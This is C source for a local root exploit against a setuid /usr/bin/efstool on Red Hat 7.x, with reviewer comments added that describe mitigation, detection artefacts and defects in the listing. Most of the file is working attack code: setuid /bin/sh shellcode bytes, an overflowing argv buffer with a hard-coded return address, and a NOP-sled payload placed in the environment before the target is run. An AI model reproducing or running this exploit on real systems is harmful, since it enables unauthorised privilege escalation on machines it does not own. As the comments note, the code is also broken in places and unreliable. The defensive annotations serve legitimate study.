/* efstool Local root exploit for redhat */
/* Requires efstool to be +s for root exploitation */
/* A good way to break from restricted Shells... */
/* Tested on Redhat 7.1/2/3 */
/* c0w_d0g3@yahoo.co.uk */
/* uk2sec */
/* http://oakey.no-ip.com:82/uk2sec/ */
/* kiddie:password */

/*
 * Reviewer summary (defensive reading of this listing):
 *
 * Purpose: proof-of-concept for a stack-based buffer overflow reached through
 * the first command-line argument of /usr/bin/efstool.  The program builds an
 * oversized argv[1], plants a payload in an environment variable, and execs
 * the target.
 *
 * Preconditions stated by the author: efstool must carry the setuid bit;
 * without it the overflow runs with the caller's own privileges.  The author
 * lists Red Hat 7.1/7.2/7.3 as tested.
 *
 * Mitigation: check the mode of /usr/bin/efstool and clear the setuid bit
 * (chmod u-s) or remove the binary if it is not needed; audit for unexpected
 * setuid files in general.  The listing depends on a fixed stack address and
 * on an executable stack, so address-space randomisation and non-executable
 * stacks break its assumptions.
 *
 * Detection: an exec of efstool whose argv[1] is several kilobytes of a
 * repeated byte, and an environment entry named SHELLCODE containing runs of
 * 0x90, are the artefacts this program produces.
 *
 * NOTE(review): the offset and address below are hard-coded for the author's
 * systems and part of the payload buffer is left uninitialised, so a run that
 * fails says nothing about whether a given host is vulnerable.
 */

/* NOTE(review): the header names after each #include were lost when the page
 * was extracted; the listing does not compile as shown. */
#include
#include
#include
/* c0w_d0g3@yahoo.co.uk */
/* Include libraries */

/* This is LINUX setuid /bin/sh shellcode */
int main() {
    /* Opaque machine-code payload (see the author's description above); the
     * trailing bytes are the literal path "/bin/sh". */
    char linuxshellcode[] = "\x31\xdb\x89\xd8\xb0\x17\xcd\x80" "\xeb\x16\x31\xdb\x31\xc9\xf7\xe1" "\x5b\xb0\x0b\x88\x53\x07\x52\x53" "\x89\xe1\xcd\x80\xb0\x01\xcd\x80" "\xe8\xe5\xff\xff\xff/bin/sh";

    /* Nested function definition inside main: a GCC extension, not standard C.
     * There is no return statement; the value reaches the caller only because
     * the inline asm leaves it in eax, so this is 32-bit x86 specific. */
    unsigned long sp(void) { __asm__("movl %esp, %eax"); }
    /* This returns the stack pointer and lets us put it into esp*/

    char buffer[3000];          /* becomes argv[1] of the target */
    long esp = sp();            /* only printed below; not used to build the buffer */
    long retaddr = 0xbfffff8a;  /* The return address (fixed value, not derived from esp) */
    int padding = 2684;         /* number of filler bytes written before the address */
    char shell[512];            /* environment string; not initialised here */

    printf("c0w_d0g3 uk2sec\n");
    printf("\nThis is a local exploit for /usr/bin/efstool\n");
    printf("\nEnsure efstool is +s or you'll not get far\n");
    /* NOTE(review): %x expects unsigned int, but esp and retaddr are long; the
     * format only matches on ABIs where both types have the same size. */
    printf("\n The stack pointer is at : %x\n", esp);
    printf(" The return address is at : %x\n", retaddr);

    /* Building the buffer */
    bzero(&buffer, sizeof(buffer));   /* zero fill, so strlen() below finds the end of the filler */
    memset(buffer,'A',padding);       /* filler bytes (author's note: size of buffer) */
    /* Stores retaddr immediately after the filler, i.e. at buffer + padding. */
    *(unsigned long *)(buffer+strlen(buffer))=retaddr; /* return address */
    printf("\nthe ret is : 0x%x", retaddr);

    /* First 100 bytes of shell: 0x90 fill, payload copied so that it ends at
     * index 99, then the first 10 bytes overwritten with the variable name.
     * Bytes from index 100 onward are never written, so the string handed to
     * putenv() has no guaranteed terminator and depends on stack contents. */
    memset(shell,0x90,100);
    memcpy(&shell[100-strlen(linuxshellcode)],linuxshellcode,strlen(linuxshellcode));
    memcpy(shell,"SHELLCODE=",10);
    putenv(shell);

    /* Runs the target with the oversized string as its only argument.  The
     * return value is not checked and main has no return statement. */
    execl("/usr/bin/efstool", "efstool", buffer, NULL);
}